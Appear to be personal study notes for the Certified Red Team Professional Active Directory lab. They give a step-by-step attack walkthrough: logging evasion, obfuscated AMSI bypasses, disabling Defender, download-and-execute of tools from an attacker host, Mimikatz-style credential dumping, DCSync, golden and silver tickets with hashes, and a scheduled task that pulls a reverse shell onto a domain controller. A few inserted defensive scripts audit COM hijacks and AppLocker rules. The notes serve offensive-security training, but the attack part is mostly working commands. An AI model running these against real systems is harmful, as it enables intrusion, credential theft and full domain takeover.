
Certified Red Team Professional Notes

Week 1

• Enumerate useful information like users, groups, group memberships, computers, user properties, trusts, ACLs etc. to map attack paths!

• Learn and practice different local privilege escalation techniques on a Windows machine.

• Hunt for local admin privileges on machines in the target domain using multiple methods.

• Abuse enterprise applications to execute complex attack paths that involve bypassing antivirus and pivoting to different machines.

Learning Objective 1

Enumerating Users, Computers, Domain Admins, and Enterprise Admins.

Using PowerView

Start a PowerShell session using Invisi-Shell to avoid enhanced logging. (\AD\Tools\InvisiShell\RunWithRegistryNonAdmin.bat)

C:\Users\studentx>cd \AD\Tools
C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
C:\AD\Tools>set COR_ENABLE_PROFILING=1
C:\AD\Tools>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.
C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.
C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.
C:\AD\Tools>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
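
The batch output above leaves two artefacts a defender can look for: a per-user COM class whose InprocServer32 points at a DLL, and the CLR profiler environment variables. The following is an added example, not part of the original notes or of Invisi-Shell; the function names and the list of trusted install roots are assumptions to adapt.

```powershell
# Added example: hunt for per-user COM registrations of the kind a CLR profiler hook
# relies on (HKCU\Software\Classes\CLSID\{...}\InprocServer32) and for profiler variables.
function Find-UserClsidInprocServer {
    [CmdletBinding()]
    param(
        # Install roots treated as expected DLL locations (assumption; tune per environment).
        [string[]]$TrustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)})
    )
    $roots = $TrustedRoots | Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }

    # Each loaded user hive exposes its Software\Classes as HKEY_USERS\<SID>_Classes.
    # Seeing hives of other users requires an elevated session.
    $hives = Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-(5-21|12-1)-[\d-]+_Classes$' }

    foreach ($hive in $hives) {
        $clsidRoot = "Registry::HKEY_USERS\$($hive.PSChildName)\CLSID"
        if (-not (Test-Path -LiteralPath $clsidRoot)) { continue }

        foreach ($clsid in Get-ChildItem -LiteralPath $clsidRoot -ErrorAction SilentlyContinue) {
            $inprocPath = "$clsidRoot\$($clsid.PSChildName)\InprocServer32"
            if (-not (Test-Path -LiteralPath $inprocPath)) { continue }

            # The default value of InprocServer32 is the DLL that gets loaded in-process.
            $raw = (Get-Item -LiteralPath $inprocPath).GetValue('')
            if ([string]::IsNullOrWhiteSpace($raw)) { continue }
            $dll = [Environment]::ExpandEnvironmentVariables($raw).Trim('"')

            $trusted = $false
            foreach ($r in $roots) {
                if ($dll.StartsWith($r, [StringComparison]::OrdinalIgnoreCase)) { $trusted = $true }
            }
            if ($trusted) { continue }

            $sig = if (Test-Path -LiteralPath $dll) {
                (Get-AuthenticodeSignature -LiteralPath $dll).Status
            } else {
                'FileMissing'
            }

            [pscustomobject]@{
                UserSid   = $hive.PSChildName -replace '_Classes$', ''
                Clsid     = $clsid.PSChildName
                Dll       = $dll
                Signature = $sig
            }
        }
    }
}

function Get-ClrProfilerEnvironment {
    # 'Process' shows whether the current session was started with a profiler attached;
    # 'User' and 'Machine' show persistent settings. A variable set with "set" in a
    # parent cmd.exe, as in the transcript above, only appears in the Process scope.
    $names = 'COR_ENABLE_PROFILING', 'COR_PROFILER', 'COR_PROFILER_PATH',
             'CORECLR_ENABLE_PROFILING', 'CORECLR_PROFILER'
    foreach ($scope in 'Process', 'User', 'Machine') {
        foreach ($name in $names) {
            $value = [Environment]::GetEnvironmentVariable($name, $scope)
            if ($value) {
                [pscustomobject]@{ Scope = $scope; Name = $name; Value = $value }
            }
        }
    }
}

Find-UserClsidInprocServer | Format-Table -AutoSize
Get-ClrProfilerEnvironment | Format-Table -AutoSize
```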

Load Powerview in the PowerShell Session

. C:\Ad\Tools\PowerView.ps1

To see users in the domain,

Get-DomainUser

To get only a specific property of all users, use the Select-Object cmdlet:

Get-DomainUser | select -ExpandProperty samaccountname

To see domain computer objects

Get-DomainComputer | select -ExpandProperty dnshostname

To see details of the DA group, such as SIDs and member names:

Get-DomainGroup -Identity "Domain Admins"

To enumerate members of the EA group

Get-DomainGroupMember -Identity "Enterprise Admins"

If you are not in the root domain, this command will not work. You need to query the root domain, as the EA group is only present in the root of the forest.

Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local

Using ADModule

In a different invisishell session, import the ADModule with

Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll

and 

Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

Then you can begin user enumeration with

Get-ADUser -Filter *

Use the -Properties parameter to retrieve additional properties, then select the ones you want to see, for example

Get-ADUser -Filter * -Properties * | select Samaccountname,Description

To list computers

Get-ADComputer -Filter *

Enumerate Domain Administrators with

Get-ADGroupMember -Identity 'Domain Admins'

Enumerate Enterprise Admins with

Get-ADGroupMember -Identity 'Enterprise Admins' -Server moneycorp.local

Learning Objective 2

Enumerate OUs, list all computers in the StudentMachines OU, List the GPOs, Enumerate GPO applied on the StudentMachines OU.

PowerView

To list all OUs

Get-DomainOU

To only see the names of OUs

Get-DomainOU | select -ExpandProperty name

Listing all computers in the StudentMachines OU is more complicated:

(Get-DomainOU -Identity StudentMachines).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

To get GPOs

Get-DomainGPO

To Enumerate GPO applied on the StudentMachines OU, you need to copy part of the gplink attribute from the output of the command below:

(Get-DomainOU -Identity StudentMachines).gplink

The part you need to copy will look like

{7478F170-6A0C-490C-B355-9E4618BC785D}

Then, to see GPO applied to StudentMachines, use

Get-DomainGPO -Identity '{7478F170-6A0C-490C-B355-9E4618BC785D}'

With powershell magic, you can do this all in one command:

Get-DomainGPO -Identity (Get-DomainOU -Identity StudentMachines).gplink.substring(11, (Get-DomainOU -Identity StudentMachines).gplink.length-72)

Learning Objective 3

Enumerate ACL for DA group, and view modify rights and permissions for students.

Using PowerView

To enumerate ACLs in the Domain Admins Group

Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDS -Verbose

To check for modify rights/permissions, use Find-InterestingDomainACL from powerview as such

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<student name>"}

To see permissions for the RDP group

Find-InterestingDomainAcl -ResolveGUIDs |
?{$_.IdentityReferenceName -match "RDPUsers"}

Learning Objective 4

Using Powerview

To enumerate all domains in the current forest

Get-ForestDomain -Verbose

To map all the trusts of the domain

Get-DomainTrust

To list only the external trusts in the moneycorp.local forest

Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} |
?{$_.TrustAttributes -eq "FILTER_SIDS"}

To identify external trusts of the dollarcorp domain, we can use the below command.

Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"}

Since we have Bidirectional trust between these 2 forests, we can extract information from the eurocorp.local forest. You need either bi-directional or one-way trust from the eurocorp.local to dollarcorp to be able to use the below command.

Get-ForestDomain -Forest eurocorp.local | %{Get-DomainTrust -Domain $_.Name}

Learning Objective 5

In this learning objective we will exploit a service on our machine to elevate privileges to local admin, then identify a machine in the domain where we have local admin access. We also use the privileges of a user on Jenkins on a host to get admin privileges on the dcorp-ci server.

We begin by loading PowerView after bypassing AMSI.

. C:\AD\Tools\PowerUp.ps1
Invoke-AllChecks

We can use the abuse-function (Invoke-ServiceAbuse) and add our current domain user to the local Administrators group.

Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp/student520' -Verbose

Logging in and out shows we have local administrator privileges.

For the next task, we will identify a machine in the domain where we have local admin using the Find-PSRemotingLocalAdminAccess.ps1

C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\AD\Tools> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess

We have admin access on dcorp-adminsrv and on the student machine. We can connect to dcorp-adminsrv using winrs as the student user with

winrs -r:dcorp-adminsrv cmd

Or you can do it with PowerShell Remoting

PS C:\AD\Tools> Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
PS C:\AD\Tools> [dcorp-adminsrv.dollarcorp.moneycorp.local]C:\Users\studentx\Documents> whoami
dcorp\studentx

Learning Objective 6

This learning objective focuses on setting up BloodHound to identify the shortest path to Domain Admins in the domain. BloodHound uses the neo4j graph database, so that needs to be set up first.

Install and start the neo4j service as follows:

C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community4.4.5\bin>neo4j.bat install-service
Neo4j service installed
C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community4.4.5\bin>neo4j.bat start

Once the service is installed, browse to localhost:7474 and log in with the neo4j:neo4j creds. Then open BloodHound from C:\AD\Tools\bloodHound-win32-x64\BloodHound-win-32-x64 and provide the details: bolt://localhost:7687 and the user/pass you set in the previous step. Then run the .NET AMSI bypass by using this

$ZQCUW = @"
using System;
using System.Runtime.InteropServices;
public class ZQCUW {
 [DllImport("kernel32")]
 public static extern IntPtr GetProcAddress(IntPtr hModule, string
procName);
 [DllImport("kernel32")]
 public static extern IntPtr LoadLibrary(string name);
 [DllImport("kernel32")]
 public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr
dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $ZQCUW
$BBWHVWQ =
[ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('&#97;&#109;&#115
;&#105;&#46;&#100;&#108;&#108;'))")
$XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ,
"$([systeM.neT.webUtility]::HtMldECoDE('&#65;&#109;&#115;&#105;&#83;&#99;&#97
;&#110;&#66;&#117;&#102;&#102;&#101;&#114;'))")
$p = 0
[ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p)
$TLML = "0xB8"
$PURX = "0x57"
$YNWL = "0x00"
$RTGX = "0x07"
$XVON = "0x80"
$WRUD = "0xC3"
$KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)
[System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)

Then run the following commands to run the collector:

C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
PS C:\AD\Tools> cd C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors
PS C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors> $ZQCUW
[snip .NET AMSI bypass]
PS C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors> . .\SharpHound.ps1
PS C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors> Invoke-BloodHound -CollectionMethod All -Verbose
2023-03-03T07:01:16.5006490-08:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2023-03-03T07:01:16.8282702-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-03-03T07:01:16.8595176-08:00|INFORMATION|Initializing SharpHound at 7:01 AM on 3/3/2023
2023-03-03T07:01:22.3601219-08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
[snip]
SharpHound Enumeration Completed at 7:02 AM on 3/3/2023! Happy Graphing!

Once the data is uploaded to BloodHound, search for the shortest path to Domain Admins. Ctrl will toggle labels.

Learning Objective 7

Identify a machine in the target domain where a domain admin session is available, compromise the machine, and escalate privileges to domain admin.

From our reverse shell we got on the CI machine through jenkins, we can grab PowerView from our attack machine and look for machines where a domain admin is logged in using Find-DomainUserLocation.

First you grab the sbloggingbypass.txt from the attackers machine with

PS C:\Users\Administrator\.jenkins\workspace\Projectx> iex (iwr
http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing)

Use the below command to bypass AMSI

PS C:\Users\Administrator\.jenkins\workspace\Projectx> S`eT-It`em ( 'V'+'aR'
+ 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) )
; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL
)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )

Then download and execute PowerView in memory on the victim machine with

iex ((New-Object
Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1'))

Make sure to host the file using HFS.exe or your preferred choice of hosting software. Then run

Find-DomainUserLocation

This command can take a while, but you can see if there is a domain admin session available. You can abuse it by using winrs or powershell remoting. To use winrs, use

winrs -r:dcorp-mgmt hostname;whoami

Then we can run safetykatz.exe on the dcorp-mgmt to extract credentials. To do that, we need to copy loader.exe on dcorp-mgmt from the dcorp-ci machine we have to avoid any downloading activity on dcorp-mgmt.

Run the following command on the reverse shell

iwr http://172.16.100.20/Loader.exe -OutFile C:\Users\Public\Loader.exe

Then copy it to the victim machine as such

echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe

Using winrs, add the following port forward rule on dcorp-mgmt to avoid detection

$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.20"

Note that the $null variable is used to address output redirection issues. Use loader.exe to download and execute SafetyKatz.exe in memory on the dcorp-mgmt machine with this command on the reverse shell

$null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

To do it with powershell remoting, first check we can run commands on the dcorp-mgmt machine with

Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmt

Then we’ll use Invoke-Mimi.ps1. Start by hosting it on your machine and running this on the reverse shell

iex (iwr http://172.16.100.20/Invoke-Mimi.ps1 -UseBasicParsing)

Then we need to disable AMSI on the dcorp-mgmt machine. We can do the AMSI bypass shown earlier, or use the built-in Set-MpPreference as well because we are admins on the dcorp-mgmt machine.

$sess = New-PsSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock ${function:Invoke-Mimi} -Session $sess

Using Rubeus:

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:<aes256 hash> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

This will open a new process, from which we can access the domain controller using

winrs -r:dcorp-dc whoami

Now we need to escalate to domain admin using derivative local admin. Let’s find out the machines which we have local admin privileges by loading a powershell session with invisishell and enter the following commands

PS C:\AD\Tools> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess

We have local admin on the dcorp-adminsrv, but any attempt to run loader.exe results in error ‘this program is blocked by group policy’, and any attempts to run invoke-mimi results in errors about language mode. This is because we are dropped into Constrained Language Mode when using PSRemoting. We can check if applocker is configured on dcorp-adminsrv by querying registry keys.

winrs -r:dcorp-adminsrv cmd
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2

and it looks like applocker is configured. Going through the policies will show that only Microsoft signed binaries and scripts are allowed, however there is a certain rule that is overly permissive.

C:\Users\studentx>reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2\Script\06dce67b-934c-454f-a263-2515c8796a5d
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2\Script\06dce67b-934c-454f-a263-2515c8796a5d
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SRPV2\Script\06dce67b-934c-454f-a263-2515c8796a5d
 Value REG_SZ <FilePathRule Id="06dce67b-934c-454f-a263-2515c8796a5d" Name="(Default Rule) All scripts located in the Program Files folder" Description="Allows members of the Everyone group to run scripts that are located in the Program Files folder." UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions><FilePathCondition Path="%PROGRAMFILES%\*"/></Conditions></FilePathRule>

A default rule is enabled that allows everyone to run scripts from the C:\Program Files\ Folder. We can also confirm this using powershell as such

Enter-PSSession dcorp-adminsrv

$ExecutionContext.SessionState.LanguageMode

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
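
From the defender's side, the same policy can be audited for Allow path rules that apply to broad groups, together with who is able to place files under the allowed directory. This is an added example, not part of the original notes: the sample policy is constructed from the rule quoted above, and the function names, the broad-SID list and the path-variable map are assumptions.

```powershell
# Added example. Sample policy constructed from the rule shown in the reg query output;
# on a live host use instead: [xml](Get-AppLockerPolicy -Effective -Xml)
$samplePolicy = [xml]@'
<AppLockerPolicy Version="1">
  <RuleCollection Type="Script" EnforcementMode="Enabled">
    <FilePathRule Id="06dce67b-934c-454f-a263-2515c8796a5d" Name="(Default Rule) All scripts located in the Program Files folder" Description="Allows members of the Everyone group to run scripts that are located in the Program Files folder." UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
'@

# Principals broad enough that an Allow rule effectively applies to every logon (assumption).
$BroadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
}

# AppLocker path variables mapped to real directories (only the two needed here).
$AppLockerVars = @{
    '%PROGRAMFILES%' = @($env:ProgramFiles, ${env:ProgramFiles(x86)})
    '%WINDIR%'       = @($env:SystemRoot)
}

function Get-BroadAppLockerPathRule {
    param([Parameter(Mandatory)][xml]$Policy)
    foreach ($rule in $Policy.SelectNodes('//RuleCollection/FilePathRule[@Action="Allow"]')) {
        $sid = $rule.GetAttribute('UserOrGroupSid')
        if (-not $BroadSids.ContainsKey($sid)) { continue }
        foreach ($cond in $rule.SelectNodes('Conditions/FilePathCondition')) {
            [pscustomobject]@{
                Collection  = $rule.ParentNode.GetAttribute('Type')
                Enforcement = $rule.ParentNode.GetAttribute('EnforcementMode')
                Principal   = $BroadSids[$sid]
                RuleName    = $rule.GetAttribute('Name')
                Path        = $cond.GetAttribute('Path')
            }
        }
    }
}

function Resolve-AppLockerDirectory {
    # Turns "%PROGRAMFILES%\*" into the directories the rule covers on this host.
    param([Parameter(Mandatory)][string]$RulePath)
    foreach ($var in $AppLockerVars.Keys) {
        if ($RulePath.StartsWith($var, [StringComparison]::OrdinalIgnoreCase)) {
            $rest = $RulePath.Substring($var.Length).TrimEnd('*').TrimEnd('\')
            $AppLockerVars[$var] | Where-Object { $_ } | ForEach-Object { $_ + $rest }
        }
    }
}

function Get-DirectoryWriter {
    # Rights that let a principal place a new file: CreateFiles/WriteData (0x2),
    # GENERIC_WRITE (0x40000000) or GENERIC_ALL (0x10000000).
    param([Parameter(Mandatory)][string]$Directory)
    $writeMask = 0x2 -bor 0x40000000 -bor 0x10000000
    (Get-Acl -LiteralPath $Directory).Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       (([int]$_.FileSystemRights -band $writeMask) -ne 0) } |
        Select-Object -Property IdentityReference, FileSystemRights -Unique
}

# One row per (rule, directory, principal that can stage a file the rule will allow).
$report = foreach ($rule in (Get-BroadAppLockerPathRule -Policy $samplePolicy)) {
    foreach ($dir in (Resolve-AppLockerDirectory -RulePath $rule.Path)) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        foreach ($writer in (Get-DirectoryWriter -Directory $dir)) {
            [pscustomobject]@{
                Collection = $rule.Collection
                AppliesTo  = $rule.Principal
                Directory  = $dir
                CanWrite   = $writer.IdentityReference
                Rights     = $writer.FileSystemRights
            }
        }
    }
}
$report | Format-Table -AutoSize
```

Every principal listed under CanWrite can place a script where the rule permits execution, which is why local admin rights on the server were enough in the walkthrough.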

We can drop scripts in the Program Files directory and execute them from there, but we’ll need to disable defender first using

 Set-MpPreference -DisableRealtimeMonitoring $true -Verbose

Also, because we cannot dot-source scripts in CLM, we must modify Invoke-Mimi.ps1 to include the function call in the script itself and transfer the modified script to the target server.

Create Invoke-MimiEx.ps1

  • Create a copy of Invoke-Mimi.ps1 and rename it to Invoke-MimiEx.ps1.
  • Open Invoke-MimiEx.ps1 in PowerShell ISE (Right click on it and click Edit).
  • Add “Invoke-Mimi -Command ‘“sekurlsa::ekeys”’ “ (without quotes) to the end of the file.

Then run this command to copy it to the target machine

Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'

Then run the script without . sourcing as such

.\Invoke-MimiEx.ps1

And we can get credentials for srvadmin, appadmin, and websvc users. From local system (as admin) we can overpass the hash using safetykatz:

C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe" "exit"

The new process spawned has srvadmin privileges, we can check if srvadmin has admin privileges on other machines as such:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Verbose

And we will see that we have local admin access on the dcorp-mgmt as srvadmin, which we know already has a session of svcadmin. We can use SafetyKatz to extract more credentials from the machine. Run the below commands from the process running as srvadmin. First copy the loader to dcorp-mgmt:

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe

Extract the credentials:

winrs -r:dcorp-mgmt cmd
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

We can also use Invoke-Mimi with PSRemoting as such

Enter-PSSession -ComputerName dcorp-mgmt

And then disable AMSI using the “set item” blob. Then download and execute Invoke-Mimi as follows

iex (iwr http://172.16.100.X/Invoke-Mimi.ps1 -UseBasicParsing)

Invoke-Mimi -Command '"sekurlsa::ekeys"'

We can also use Invoke-Mimi to look for credentials from the credentials vault, sometimes interesting credentials like those used for scheduled tasks will be stored here. You can do this as such:

Invoke-Mimi -Command '"token::elevate" "vault::cred /patch"'

Finally, we can use the svcadmin credentials on the student VM using OverPass-the-Hash as such:

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

And the new process will start with the privileges of svcadmin.

Learning Objective 8

In this learning objective we will extract secrets from the DC of dollarcorp, using the secrets of KRBTGT account to make a golden ticket, and use the golden ticket to get domain admin privileges from a machine.

Using SafetyKatz.exe

Run the below command from an admin cmd prompt to start a process with DA privileges:

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Then run the below commands from the process running as DA to copy loader.exe onto the DC and use it to extract credentials

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

winrs -r:dcorp-dc cmd

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.20

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe

lsadump::lsa /patch

or, to get the NTLM hash and AES keys of the krbtgt account, we can use the DCSync attack as follows from the DA process:

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Finally, we can use BetterSafetyKatz.exe to create a golden ticket as such

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

klist (will show cached ticket with client: Administrator)

dir \\dcorp-dc\c$

Using Powershell remoting and Invoke-Mimi.ps1

Start a process with domain admin privileges and run the below command from an elevated shell:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Invoke-Mimi.ps1

Invoke-Mimi -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:cmd.exe"'

Then run the below commands in the process running as DA

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

cd C:\AD\Tools

$sess = New-PSSession -ComputerName dcorp-dc

Enter-PSSession $sess

S`eT-It`em ( 'V'+'aR' + 'IA' +
('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; (
Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"((
"{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )

exit

Invoke-Command -FilePath .\Invoke-Mimi.ps1 -Session $sess

Enter-PSSession $sess

Invoke-Mimi -Command '"lsadump::lsa /patch"'

We can also run DCSync from the process running as DA as such:

Invoke-Mimi -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

And create the golden ticket with:

Invoke-Mimi -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

and check with

ls \\dcorp-dc\c$

We can also run WMI commands on the DC

gwmi -Class win32_computersystem -ComputerName dcorp-dc

Learning Objective 9

Objective: Get command execution on the domain controller by creating silver ticket for Host service and WMI. From the information gathered in the previous objective, we have the hash for the machine account of the domain controller (dcorp-dc$). Using the below command we can create a Silver Ticket that provides us access to the HOST service of the DC. Run this command from an elevated shell:

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Or you can use Invoke-Mimi for the same results using:

Invoke-Mimi -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

In either case, you should see: Golden ticket for 'Administrator @ dollarcorp.moneycorp.local' successfully submitted for current session.

We can then start a listener and schedule a task to run the reverse shell script using Invoke-PowerShellTcpEx.ps1. First create a copy of Invoke-PowerShellTcp.ps1 and rename it Invoke-PowerShellTcpEx.ps1 and add the function call Power -Reverse -IPAddress 172.16.100.20 -Port 443 to the end of the file. Then run the below command in the process where we injected the ticket for the HOST service. Make sure your listener is already running.

schtasks /create /S dcorp-dc /SC Weekly /RU "NT Authority\SYSTEM" /TN "User520" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.20/InvokePowerShellTcpEx.ps1''')'"

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "User520"

To access WMI, we need to create two tickets, one for the HOST service and another for RPCSS. Run the below commands from an elevated shell.

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Inject a ticket for RPCSS:

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Check if the ticket is present with klist and look for Server:RPCSS/dcorp-dc.dollarcorp.moneycorp.local and HOST/dcorp-dc.dollarcorp.moneycorp.local

Now run the WMI commands on the domain controller:

